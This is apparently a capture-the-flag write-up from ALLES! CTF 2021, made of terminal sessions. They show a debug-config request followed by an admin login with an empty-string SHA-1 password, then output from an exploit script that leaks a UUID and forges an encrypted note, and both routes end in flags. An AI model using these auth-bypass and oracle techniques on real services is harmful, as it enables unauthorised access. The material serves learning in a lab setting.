$ echo '{"debugMode": true}' | http --session=./session.json POST "https://7b000000f4b98db0221891c1-just-serving-pages.challenge.master.allesctf.net:31337/config"
HTTP/1.1 200
Content-Length: 2900
Content-Type: text/html;charset=utf-8
Date: Sat, 04 Sep 2021 11:26:02 GMT
Set-Cookie: JSESSIONID=7D12EE368BD32FB4C496CBE29BA4A23D; Path=/; HttpOnly
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
... snip ...
<p>
<div class="alert alert-success" role="alert">
User configuration updated
</div>
</p>
</main><!-- /.container -->
</html>
$ http --session=./session.json --form POST "https://7b000000f4b98db0221891c1-just-serving-pages.challenge.master.allesctf.net:31337/login" username=admin password=da39a3ee5e6b4b0d3255bfef95601890afd80709
HTTP/1.1 200
Content-Length: 2935
Content-Type: text/html;charset=utf-8
Date: Sat, 04 Sep 2021 11:26:37 GMT
<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
... snip ...
<h1>Welcome to the User Panel</h1>
You are <b></b>admin</b>
<br><br>
Your flag is:
ALLES!{ohh-b0y-java-y-u-do-th1s-t0-m3???!?}
<br>
<a href="logout">Logout</a>
</main><!-- /.container -->
</html>
da39a3ee5e6b4b0d3255bfef95601890afd80709
is SHA-1 of an empty string.
Flag: ALLES!{ohh-b0y-java-y-u-do-th1s-t0-m3???!?}
$ python exploit.py
4
4c
4ca
... snip ...
4ca51bd230de44bbb2f7fab021cc73
4ca51bd230de44bbb2f7fab021cc730
user_uuid: 4ca51bd230de44bbb2f7fab021cc730e
ENCRYPT:
ENCRYPT:c
ENCRYPT:c1
... snip ...
ENCRYPT:c1FtNStvTzZzTU91NkIxSld3OVhtUT09OlFvQnNWNHgyVU9qcVF6ZVZ3aEhmWnR6NzJ6VDltVkFQM1BxdVNvcVJhVlVsYS9xbEZ3c0poNU9IOWRxZXpTbz06NUpQL1FNNzJZdVJsWjBWWWFVZEVpUT0
ENCRYPT:c1FtNStvTzZzTU91NkIxSld3OVhtUT09OlFvQnNWNHgyVU9qcVF6ZVZ3aEhmWnR6NzJ6VDltVkFQM1BxdVNvcVJhVlVsYS9xbEZ3c0poNU9IOWRxZXpTbz06NUpQL1FNNzJZdVJsWjBWWWFVZEVpUT09
cipher_note: ENCRYPT:c1FtNStvTzZzTU91NkIxSld3OVhtUT09OlFvQnNWNHgyVU9qcVF6ZVZ3aEhmWnR6NzJ6VDltVkFQM1BxdVNvcVJhVlVsYS9xbEZ3c0poNU9IOWRxZXpTbz06NUpQL1FNNzJZdVJsWjBWWWFVZEVpUT09
<!doctype html>
<html>
<head>
<meta charset="UTF-8" />
<meta name="viewport" content="width=device-width, initial-scale=1.0" />
<link href="https://unpkg.com/tailwindcss@^2/dist/tailwind.min.css" rel="stylesheet">
<link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.4/css/all.min.css" rel="stylesheet">
<title>noter</title>
</head>
<body class="bg-gray-50">
<div class="flex flex-row bg-gray-100 px-5 py-2">
<a href="/notes" class="hover:underline hover:text-green-500 text-black py-1 px-4 font-bold">
noter <span class="text-green-500" style="font-size:.6rem">DEMO</span>
</a>
<a href="/notes" class="hover:underline hover:text-green-600 text-green-500 py-1 px-4 mr-2">ALLES!{American_scientists_said,_dont_do_WAFs!}</a>
<a href="/logout">
... snip ...
Flag: ALLES!{American_scientists_said,_dont_do_WAFs!}